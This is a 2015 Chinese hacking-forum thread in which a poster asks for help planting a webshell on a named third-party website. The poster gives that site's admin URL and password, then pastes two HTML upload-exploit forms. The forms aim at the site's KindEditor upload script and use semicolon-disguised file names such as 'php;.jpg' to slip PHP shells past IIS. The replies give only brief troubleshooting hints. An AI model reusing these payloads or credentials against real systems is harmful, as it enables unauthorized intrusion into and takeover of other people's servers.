phpweb后台拿shell

国光nice · 发表于 2015-11-18 17:54:33

http://lnlyjd.com/base/admin/index.php 账号admin 密码a123456789
手上有几个webshell是后台 IIS7.5的通过那exp上传失败。burp抓包的话返回路径也没有。

国光nice · 发表于 2015-11-18 17:57:31

<form name="uploadForm" method="post" enctype="multipart/form-data" action="http://lnlyjd.com/kedit/upload_cgi/upload.php">
<input type="text" name="fileName" value="riyurshenjiao.php;.jpg" />
<input type="hidden" name="attachPath" value="news/pics/" />
<input type="file" name="fileData" size="14" /></td>
<input type="submit" name="button" value="确定" />
</form>
以上是我用的exp 是网上找的下面是另一个但是同样无果
<form name="uploadForm" method="post" enctype="multipart/form-data" action="http://lnlyjd.com/kedit/upload_cgi/upload.php">

<input type="hidden" name="fileName" id="fileName" value="tem1p_jm.PHP;.jpg" />

<input type="hidden" name="attachPath" id="fileName" value="news/pics/" />

<select id="imageType" onchange="javascript:parent.KindImageType(this.value);document.getElementById(‘KE_IMAGEsubmitButton’).focus();">

<option value="1″ selected="selected">本地</option>

<option value="2″>远程</option>

</select>

<input type="text" id="imgLink" value="http://" maxlength="255″ style="width:95%;border:1px solid #555555;display:none;" />

<input type="file" name="fileData" id="imgFile" size="14″ style="border:1px solid #555555;" onclick="javascript:document.getElementById(‘imgLink’).value=’http://’;" /></td>

<input type="text" name="imgTitle" id="imgTitle" value="" maxlength="100″ style="width:95%;border:1px solid #555555;" />

<input type="text" name="imgWidth" id="imgWidth" value="0″ maxlength="4″ style="width:40px;border:1px solid #555555;" />

<input type="text" name="imgHeight" id="imgHeight" value="0″ maxlength="4″ style="width:40px;border:1px solid #555555;" />

<input type="text" name="imgBorder" id="imgBorder" value="0″ maxlength="1″ style="width:20px;border:1px solid #555555;" />

<select id="imgAlign" name="imgAlign">

<option value="">对齐方式</option>

<option value="baseline">baseline</option>

<option value="top">top</option>

<option value="middle">middle</option>

<option value="bottom">bottom</option>

<option value="texttop">texttop</option>

<option value="absmiddle">absmiddle</option>

<option value="absbottom">absbottom</option>

<option value="left">left</option>

<option value="right">right</option>

</select>

<input type="text" name="imgHspace" id="imgHspace" value="0″ maxlength="1″ style="width:20px;border:1px solid #555555;" />

<input type="text" name="imgVspace" id="imgVspace" value="0″ maxlength="1″ style="width:20px;border:1px solid #555555;" />

<input type="submit" name="button" id="KE_IMAGEsubmitButton" value="确定" style="border:1px solid #555555;background-color:#AAAAAA;" /></form>

Mrlin · 发表于 2015-11-18 18:29:40

提示: 作者被禁止或删除内容自动屏蔽

2469234646 · 发表于 2015-11-18 19:19:14

提示: 作者被禁止或删除内容自动屏蔽

国光nice · 发表于 2015-11-18 21:30:26

2469234646 发表于 2015-11-18 19:19
这个比，给你满分

我是求助的啊 exp上传失败怎么破？

国光nice · 发表于 2015-11-18 21:31:15

Mrlin 发表于 2015-11-18 18:29
写的不错不过帖子要再精炼点就更好了发帖子时要捡重要的写这样简单易懂不过新人能发出这样的帖子也不 ...

可以给个思路吗？

No0d1es · 发表于 2015-11-19 12:39:16

expd的使用是有条件的，是分iis6.0和apache的exp，对于iis7.5你怎么用这个exp？也许burp可能帮你解决。

Mrlin Mrlin 当前离线积分 374 头像被屏蔽	发表于 2015-11-18 18:29:40 \| 显示全部楼层提示: 作者被禁止或删除内容自动屏蔽
Mrlin Mrlin 当前离线积分 374 头像被屏蔽
	回复支持反对使用道具举报

2469234646 2469234646 当前离线积分 174 头像被屏蔽	发表于 2015-11-18 19:19:14 来自手机 \| 显示全部楼层提示: 作者被禁止或删除内容自动屏蔽
2469234646 2469234646 当前离线积分 174 头像被屏蔽
	回复支持 0 反对 2 使用道具举报

phpweb后台拿shell

相关帖子

指导单位

旗下站点

联系我们